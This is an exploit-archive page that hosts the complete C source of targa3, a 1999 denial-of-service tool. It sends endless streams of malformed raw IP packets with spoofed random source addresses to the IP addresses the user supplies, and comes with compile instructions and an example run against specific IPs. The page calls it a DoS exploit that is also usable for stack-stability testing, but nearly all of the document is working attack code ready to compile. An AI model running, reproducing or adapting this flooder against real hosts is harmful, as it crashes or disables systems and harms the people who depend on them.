exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

targa3.c

targa3.c
Posted Nov 9, 1999
Authored by Mixter | Site members.tripod.com

targa3 is a DoS exploit that sends random IP packets with parameters known to cause crashes on various machines, and can be used to determine if a systems IP stack is really stable and crash-proof under unexpected conditions.

tags | denial of service
SHA-256 | 6253f5fba61013437021a6884ee572f1df8670c179847720a71bf3779779e140

targa3.c

Change Mirror Download
/*
* targa3 - 1999 (c) Mixter <mixter@newyorkoffice.com>
*
* IP stack penetration tool / 'exploit generator'
* Sends combinations of uncommon IP packets to hosts
* to generate attacks using invalid fragmentation, protocol,
* packet size, header values, options, offsets, tcp segments,
* routing flags, and other unknown/unexpected packet values.
* Useful for testing IP stacks, routers, firewalls, NIDS,
* etc. for stability and reactions to unexpected packets.
* Some of these packets might not pass through routers with
* filtering enabled - tests with source and destination host
* on the same ethernet segment gives best effects.
*
* Example:
* ./targa3 193.116.54.15 192.88.209.18 134.205.131.22 -c 1000
*
* Linux, *BSD:
* cc -Wall -O2 -s -o targa3 targa3.c
* IRIX, HPUX, OSF (untested yet):
* cc -ldld -o targa3 targa3.c
* Solaris, SunOS:
* cc -lnsl -lsocket -o targa3 targa3.c
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>

u_char rseed[4096];
int rsi, rnd, pid;

#if __BYTE_ORDER == __LITTLE_ENDIAN
#ifndef htons
unsigned short int htons (unsigned short int hostshort);
#endif
#define TONS(n) htons(n)
#elif __BYTE_ORDER == __BIG_ENDIAN
#define TONS(n) (n)
#endif

struct sa_in
{
unsigned short int sin_family, sin_port;
struct
{
unsigned int s_addr;
}
sin_addr;
unsigned char sin_zero[8];
};

struct iph
{ /* IP header */
#if __BYTE_ORDER == __LITTLE_ENDIAN
#define TONS(n) htons(n)
unsigned char ihl:4;
unsigned char version:4;
#elif __BYTE_ORDER == __BIG_ENDIAN
#define TONS(n) (n)
unsigned char version:4;
unsigned char ihl:4;
#endif
unsigned char tos;
unsigned short int tot_len;
unsigned short int id;
unsigned short int frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short int check;
unsigned int saddr;
unsigned int daddr;
};

unsigned long int inet_addr (const char *cp);

unsigned int
realrand (int low, int high)
{
int evil[2];
evil[0] = rseed[rsi];
evil[1] = rseed[rsi + 1];
rsi += 2;
if (evil[0] == 0x00)
evil[0]++;
if (evil[1] == 0x00)
evil[1]++;
srandom (time (0));
srand (random () << pid % evil[0] >> evil[1]); /* don't ask :P */
return ((rand () % (int) (((high) + 1) - (low))) + (low));
}

void
sigh (int sig)
{
puts (" ] \n");
exit (0);
}

int
main (int argc, char **argv)
{
int s = socket (AF_INET, SOCK_RAW, 255); /* IPPROTO_RAW */
int res, psize, loopy, targets = 0, tind, count = -1;
char *packet, ansi[16];
struct sa_in sin;
struct iph *ip;
u_long target[200];

int proto[14] =
{ /* known internet protcols */
0, 1, 2, 4, 6, 8, 12, 17, 22, 41, 58, 255, 0,
};
int frags[10] =
{ /* (un)common fragment values */
0, 0, 0, 8192, 0x4, 0x6, 16383, 1, 0,
};
int flags[7] =
{ /* (un)common message flags */
0, 0, 0, 0x4, 0, 0x1,
};

rnd = open ("/dev/urandom", O_RDONLY);
read (rnd, rseed, 4095);
rsi = 0;

snprintf (ansi, 15, "[%d;3%dm", realrand (0, 1), realrand (1, 7));
printf ("\t\t%starga 3.0 by Mixter\n", ansi);
fflush (stdout);

if (argc < 2)
{
fprintf (stderr, "usage: %s <ip1> [ip2] ... [-c count]\n", argv[0]);
exit (-1);
}

if (argc > 201)
{
fprintf (stderr, "cannot target more than 200 hosts!\n");
exit (-1);
}

for (loopy = 1; loopy < argc; loopy++)
{
if (strcmp (argv[loopy - 1], "-c") == 0)
{
if (atoi (argv[loopy]) > 1)
count = atoi (argv[loopy]);
continue;
}
if (inet_addr (argv[loopy]) != -1)
{
target[targets] = inet_addr (argv[loopy]);
targets++;
}
}

if (!targets)
{
fprintf (stderr, "no valid ips found!\n");
exit (-1);
}

snprintf (ansi, 15, "[%d;3%dm", realrand (0, 1), realrand (1, 7));
printf ("%s\tTargets:\t%d\n", ansi, targets);
printf ("\tCount:\t\t");
if (count == -1)
puts ("infinite");
else
printf ("%d\n", count);

printf (" [ ");
fflush(0);

for (res = 0; res < 18; res++)
signal (res, sigh);

pid = getpid ();
psize = sizeof (struct iph) + realrand (128, 512);
packet = calloc (1, psize);
ip = (struct iph *) packet;

setsockopt (s, 0, 3, "1", sizeof ("1")); /* IP_HDRINCL: header included */
sin.sin_family = PF_INET;
sin.sin_port = TONS (0);
while (count != 0)
{
if (count != -1)
count--;
for (loopy = 0; loopy < 0xff;)
{
for (tind = 0; tind < targets + 1; tind++)
{
sin.sin_addr.s_addr = target[tind];
if (rsi > 4000)
{
read (rnd, rseed, 4095);
rsi = 0;
}
read (rnd, packet, psize);
proto[13] = realrand (0, 255);
frags[9] = realrand (0, 8100);
flags[6] = realrand (0, 0xf);
ip->version = 4;
ip->ihl = 5;
ip->tos = 0;
ip->tot_len = TONS (psize);
ip->id = TONS (realrand (1, 10000));
ip->ttl = 0x7f;
ip->protocol = proto[(int) realrand (0, 13)];
ip->frag_off = TONS (frags[(int) realrand (0, 9)]);
ip->check = 0;
ip->saddr = random ();
ip->daddr = target[tind];
res = sendto (s,
packet,
psize,
flags[(int) realrand (0, 6)],
(struct sockaddr *) &sin,
sizeof (struct sockaddr));
if (res)
loopy++;
}
}
snprintf (ansi, 15, "[%d;3%dm", realrand (0, 1), realrand (1, 7));
printf ("%s.", ansi);
usleep (200);
fflush (stdout);
}

free (packet); /* free willy */

puts (" ]\n");

return 0;
}

/* After cutting this line, md5sum will be 6550270c101b4895c8c0fb4b75881421 */
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close